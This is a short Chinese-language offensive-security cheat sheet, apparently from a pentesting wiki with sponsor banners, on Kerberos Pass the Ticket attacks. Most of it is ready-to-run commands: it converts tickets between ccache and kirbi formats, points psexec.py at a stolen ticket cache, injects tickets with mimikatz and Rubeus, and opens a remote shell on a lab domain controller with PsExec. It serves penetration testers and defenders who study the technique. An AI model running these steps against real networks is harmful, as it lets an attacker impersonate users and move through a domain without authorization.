Pass the Ticket

使用Trickest可以轻松构建和自动化工作流程,使用世界上最先进的社区工具。 立即获取访问权限:
传递票据(PTT)
在传递票据(PTT)攻击方法中,攻击者窃取用户的身份验证票据,而不是其密码或哈希值。然后使用这个被窃取的票据冒充用户,未经授权地访问网络中的资源和服务。
阅读:
在平台之间交换Linux和Windows票据
ticket_converter工具使用票据本身和输出文件来转换票据格式。
python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi
python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache
传递票据攻击
在Windows中可以使用Kekeo。
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/[email protected] -k -no-pass
#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe][email protected]"
.\Rubeus.exe ptt /ticket:[0;28419fe][email protected]
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
参考资料

使用 Trickest 可以轻松构建和 自动化工作流程,使用世界上 最先进 的社区工具。 立即获取访问权限:
最后更新于